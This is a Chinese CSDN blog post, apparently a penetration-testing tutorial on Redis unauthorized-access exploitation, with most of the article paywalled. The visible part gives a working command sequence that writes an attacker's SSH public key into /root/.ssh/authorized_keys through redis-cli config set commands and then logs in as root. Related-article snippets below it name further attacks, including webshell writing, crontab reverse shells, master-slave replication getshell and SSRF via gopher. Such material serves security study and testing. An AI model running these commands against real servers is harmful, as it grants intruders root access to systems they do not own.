【渗透测试】redis漏洞利用(1),金三银四旗开得胜

已于 2024-04-09 01:10:08 修改
阅读量1k 收藏 29
点赞数 9
分类专栏: 2024年程序员学习 文章标签: redis 数据库 缓存
于 2024-04-09 01:10:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61331237/article/details/137529839
版权

save

在这里插入图片描述在这里插入图片描述## 写入 SSH公钥

在本地生成一对密钥:
$ ssh-keygen -t rsa
然后将公钥写入 key.txt 文件
$ (echo -e “\n\n”; cat id_rsa.pub; echo -e “\n\n”) > key.txt
之后利用redis未授权访问漏洞将公钥写到/root/.ssh/id_rsa文件中
$ cat key.txt | redis-cli -h ip -x set crackit
$ redis-cli -h ip -x set crackit
config set dir /root/.ssh
config get dir
config set dbfilename "authorized_keys " //必须为authorized_keys,写死在redis.conf配置文件里的
save
这样就可以成功的将自己的公钥写入 /root/.ssh 文件夹的 authotrized_keys 文件里,然后攻击者直接执行
$ ssh –i id_rsa ip

在这里插入图片描述

最低0.47元/天 解锁文章
m0_61331237
关注
专栏目录
《WEB安全渗透测试》(25)Redis漏洞利用方式大全
午夜安全
05-04 2660
《WEB安全渗透测试》(25)Redis漏洞利用方式大全 Redis被公司大量应用,成为了攻击者最喜欢的猎物之一,大量的木马病毒也广泛利用redis漏洞在内网疯狂传播,对内网扫描、控制、感染、挖矿、勒索等行为和事件层出不穷。然而Redis的利用方式你真的全部了解吗?你的redis安全吗?设置密码了吗?密码是否太弱?当redis口令过弱,或者使用了一些频率过高的密码(被密码字典收录),甚至没有设置密码,这个时候你的redis很可能已经被非法用户恶意访问。...
渗透测试-Redis未授权访问漏洞利用
cdyunaq的博客
12-24 1203
危害 信息泄露 系统信息 redis保存的信息 写文件GetShell 在Web目录中写入webshell 写入SSH公钥直接连接 写入计划任务(corntab)反弹shell 高级利用 主从复制getshell(4.x version < 5.0.5) 模块加载执行命令(> 4.x) 环境准备 机型 ip 服务 版本 攻击机
Redis渗透测试的一些Tips
qq_36334672的博客
02-11 982
Redis默认端口为6379Redis支持五种数据类型:string(字符串),hash(哈希),list(列表),set(集合)及zset(sorted set:有序集合)。String类型最全能,可以包含任何数据Hash 相当于是一个key可以储存多个 所以一个hash可以有多个键值对List 允许用户从序列的两端快速推入或者弹出元素,应用场景:最新消息排行(热搜?set 无序不可重复,具有唯一性sortedset 有顺序,不可重复,和set的区别是存在一个参数(排序)与之关联。
Redis未授权访问利用
LiuSiXian的博客
07-14 781
Redis服务器:192.168.100.10攻击机:192.168.15.101。
ssrf结合redis写入公钥
m0_65540912的博客
07-05 997
我这里用了Web-Redis-Lab漏洞环境来演示攻击机kali:192.168.168.128。
记一次学习过程(redis的编译安装,以及有关redis漏洞的学习,包括redis未授权写入ssh公钥redis写入木马、redis主从复制漏洞linux版)同时记录几个威胁分析平台
最新发布
banliyaoguai的博客
08-03 981
这个东西的流程是你发现了一个网站,然后你扫描对方端口,发现6379端口开着,而且通过一些其他漏洞可以登陆上redis后,你在redis中执行操作获取webshell权限。测试公私钥的时候不要在你的攻击机子和redis的服务器的机子上测试,或者你把测试完成的文件在服务器上删掉,删掉之前记得保存。这个是你冒充redis的主服务器,让redis从服务器下载木马(这里使用工具)这是你已经连接上了redis,你在redis中操作,在redis中写入公钥。(下图是测试出现问题的情况,没出现问题的情况忘记截图了)
Xshell工具利用Redis 6379写入SSH公钥漏洞
maple_leaf
05-03 549
本文介绍了如何利用Xshell工具利用Redis 6379端口的漏洞,向目标主机注入SSH公钥
Redis未授权漏洞复现及利用(window,linux)
dreamthe的博客
03-22 2万+
1.了解redis Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivota赞助。 2.redis漏洞原理 Redis默认情况下是绑定在0.0.0.0:6379端口的,如果没有设置密码(一般密码为空)或者密码为弱密码的情况下并且也没有
redis漏洞利用
爱测未来团队博客
07-06 9703
前言       说起来redis的安全问题被大众关注也有一些时间了,但是日常生活中还是有很多运维人员不知道redis如何配置会比较安全,一部分安全测试人员对这个漏洞利用不是很熟悉,所以就有了这篇文章。在此之前我第一次遇到这个问题的时候也百度很多前辈的文章看了一下,但是还是觉得过程很繁琐,操作起来不是很方便。我自己就搭建了一个环境做了一次漏洞复现实验,这里把过程记录下来分享给大家,希望安全人员以后...
【网络安全】通过Redis2.x实现ssh未授权访问
kinghzking的专栏
08-23 2419
下载redis-server(目标机器,kali):https://pan.baidu.com/s/1I9mByRQjFaNvt040xOm8_w?下载redis-cli(攻击机器,win11):https://pan.baidu.com/s/1qAkZMBUWVWJvU2bpBq_LNQ?redis刚好能满足我们的需求,2.x版本的redis,默认配置,能被外网访问,并完成上面的操作,我们正是利用这个特性,完成。攻击机(win11)上连接目标机(kali)目标机器的redis-server安装和配置。
Redis未授权访问漏洞详解(全面)
m0_64481831的博客
02-26 3890
Redis是一款内存高速缓存数据库,是一款K-V型数据库,它的所有键值都是用字典来存储的。其中它的value支持多种数据类型,包括String、List、Set、Zset和Hash。Redis默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问,就会将Redis服务暴露在公网上;并且Redis默认情况是空密码连接在服务器以root身份运行Redis时这将导致任意用户可以访问目标服务器下未授权访问Redis以及读取Redis数据。
SSRF 302跳转 gopher协议攻击redis写入ssh公钥,实现远程无密登录(学习总结)
L2329794714的博客
11-20 3252
一、SSRF漏洞 SSRF(Server Side Request Forgery,服务器端请求伪造)是一种攻击者通过构造数据进而伪造服务器端发起请求的漏洞,因为求情是由服务器发出的,所以往往是利用SSRF漏洞攻击服务器所在网络内部系统。 SSRF漏洞形成原因是服务器提供了从外部获取数据的功能,但没有对获取数据的目标地址、协议等进行过滤和限制,从而攻击者可以让服务器发起任意请求。 如下是一个简单的SSRF漏洞,对传入的url 没有做任何限制。即可通过向...
ssh公钥都追加到authorized_keys文件了,但是还是无法免秘钥登陆
热门推荐
孑然一身踽踽而行
07-06 3万+
步骤: 1、主机生成公钥 ssh-keygen -t rsa -P '' 一路回车 2、从主机节点拷贝id-rsa.pub到从机worker1scp /root/.ssh/id_rsa.pub root@worker1:/root/.ssh/id_rsa.pub.master 3、在主机和从机上执行如下命令cat /root/.ssh/id_rsa.p...
请务必注意 Redis 安全配置,否则将导致轻松被入侵
多看多听多总结
12-16 4402
一、前言 前段时间,在做内网影响程度评估的时候写了扫描利用小脚本, 扫描后统计发现,内网中60%开放了redis6379端口的主机处于可以被利用的危险状态,因为都是一些默认配置造成的 考虑到本社区大部分开发者都会使用redis,特此分享下以便大家可以对自己公司的内网进行一个排查。 二、漏洞介绍 Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Red
Redis未授权访问配合SSH key的综合利用
hyy615545936的博客
09-11 1580
【实验原理】 利用 Redis 自身的提供的config命令,可以进行写文件操作,恶意访问者可以成功将自己的公钥写入目标服务器的/root/.ssh文件夹的authotrized_keys文件中,进而可以直接使用对应的私钥登录目标服务器。 步骤一:在本地生产公私钥文件 linux系统行使用命令ssh-keygen -t rsa生成本地公钥和私钥文件,输入密码口令;如下其显示成功生成公...
redis密钥登录ssh
qq_42307546的博客
09-06 890
上一章我们利用redis服务进行了任务反弹shell 这次我来演示如何利用redis密钥登录ssh **首先登录redis ** redis-cli -h 192.168.157.253 这里说下要用key登录对方主机一定要开启key登录 在kali下生成密钥公钥 ssh-keygen-t rsa 生成的公私钥存放在/root/.ssh/id_rsa 我们需要将id_rsa.pub上传到目标服务器 防止乱码 导出key (echo -e “\n\n”; cat id_rsa.pub; echo -e
史上最全的渗透测试面试题,都是干货。
m0_48368237的博客
01-30 7826
1、拿到一个待检测的站或给你一个网站,你觉得应该先做什么? 一、信息收集 1.获取域名的whois信息,获取注册者邮箱姓名电话等。 2.通过站长之家、明小子、k8等查询服务器旁站以及子域名站点,因为主站一般比较难,所以先看看旁站有没有通用性的cms或者其他漏洞。 3、通过DNS域传送漏洞、备份号查询、SSl证书、APP、微信公众号、暴力破解、DNS历史记录、K8 C段查询、Jsfinder、360或华为威胁情报、证书序列号获取企业域名与ip。 4.通过Nmap、Wappalyzer、御剑等查看服务器操作系统
Redis未授权访问之ssh免密登录(踩坑)
Zlirving_的博客
06-29 4957
关于Redis漏洞的详解及写shell、getshell的利用请出示门票:传送门 利用原理 利用 Redis 自身的提供的 config 命令,可以进行写文件操作,攻击者可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以直接使用对应的私钥登录目标服务器。 利用 实验场景 Redis服务器(靶机):Ubuntu 16.4 ----- 192.168.101.46 Redis客户机(攻击机):Ubuntu 16.4 ----- 192.168.
redis 漏洞利用
09-30
redis 漏洞利用可以通过redis-rogue-server工具来实现。该工具适用于目标存在Redis未授权访问漏洞时使用,无法对Redis密码进行认证。你可以从https://github.com/n0b0dyCN/redis-rogue-server下载该工具。请注意,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值